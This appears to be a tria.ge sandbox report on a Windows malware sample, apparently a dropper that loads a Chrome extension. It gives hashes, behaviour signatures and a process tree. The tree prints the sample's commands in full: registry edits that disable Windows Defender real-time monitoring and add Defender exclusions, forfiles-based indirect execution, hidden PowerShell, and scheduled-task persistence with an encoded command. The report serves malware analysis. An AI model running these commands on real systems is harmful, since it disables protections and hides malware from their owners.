Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    245s
  • max time network
    246s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    26/08/2024, 05:01

General

  • Target

    35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe

  • Size

    7.3MB

  • MD5

    d899e1c3b4b597f35991ad001796efb6

  • SHA1

    74b306cc449fab5ca903c480a953c4390660cca4

  • SHA256

    35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549

  • SHA512

    99220fbfc50497a6c194a0adff91ab88d8617d71572e787896d11ba374d936acdc4fa2ab519d494cc5c6a0f1bd2d19158f3bed4a782827e88f51c562a9c1daa0

  • SSDEEP

    196608:91OlKUM0XQhhsNRl31gOfczhFgsm7BrrcfWMhbr0Ow6mrjKLlT:3OlQ0U+pfcFCsm7BrrcfXG6JLl

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe
    "C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Users\Admin\AppData\Local\Temp\7zSC67A.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2312
      • C:\Users\Admin\AppData\Local\Temp\7zSC8CB.tmp\Install.exe
        .\Install.exe /ldidp "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2116
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2072
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2288
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2184
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2460
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2720
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2716
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2752
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:2760
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                  PID:2816
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2820
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:2836
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2848
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                      PID:3068
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                  • Indirect Command Execution
                  PID:2764
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    6⤵
                      PID:2740
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2304
                        • C:\Windows\SysWOW64\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          8⤵
                            PID:2608
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                    4⤵
                    • Indirect Command Execution
                    PID:2700
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      5⤵
                        PID:3016
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3036
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            7⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3004
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bWNXgrRlacKgnUwPKK" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe\" Hi /gdpdidfiz 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Scheduled Task/Job: Scheduled Task
                      PID:2860
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 676
                      4⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:1720
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {3B30062D-F970-4E37-9734-8D823D3745AA} S-1-5-18:NT AUTHORITY\System:Service:
                1⤵
                  PID:2052
                  • C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe
                    C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe Hi /gdpdidfiz 525403 /S
                    2⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:2068
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1792
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:496
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          5⤵
                            PID:448
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:1136
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                          4⤵
                          • Indirect Command Execution
                          • System Location Discovery: System Language Discovery
                          PID:2092
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            5⤵
                              PID:1648
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:320
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:1696
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1944
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                6⤵
                                  PID:948
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                              4⤵
                              • Indirect Command Execution
                              • System Location Discovery: System Language Discovery
                              PID:1392
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                5⤵
                                  PID:944
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1088
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                4⤵
                                • Indirect Command Execution
                                PID:2572
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                  5⤵
                                    PID:1764
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1520
                                      • C:\Windows\SysWOW64\gpupdate.exe
                                        "C:\Windows\system32\gpupdate.exe" /force
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2096
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "gCsdWAqEI" /SC once /ST 00:16:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:1784
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /run /I /tn "gCsdWAqEI"
                                3⤵
                                  PID:2140
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "gCsdWAqEI"
                                  3⤵
                                    PID:2904
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2756
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      4⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      • System Location Discovery: System Language Discovery
                                      PID:2820
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2760
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                      4⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      PID:2852
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "gcpmSykxt" /SC once /ST 02:28:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2980
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /run /I /tn "gcpmSykxt"
                                    3⤵
                                      PID:2204
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /DELETE /F /TN "gcpmSykxt"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1352
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                      3⤵
                                      • Indirect Command Execution
                                      • System Location Discovery: System Language Discovery
                                      PID:768
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1536
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1356
                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                            6⤵
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2728
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                        PID:2696
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2008
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1008
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:1000
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                          PID:1692
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:1656
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2504
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2168
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C copy nul "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1592
                                          • C:\Windows\SysWOW64\wscript.exe
                                            wscript "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies data under HKEY_USERS
                                            PID:2560
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1092
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:320
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:612
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1088
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1460
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:484
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1596
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:908
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1788
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2256
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1264
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1752
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:716
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2404
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1296
                                            • C:\Windows\SysWOW64\reg.exe
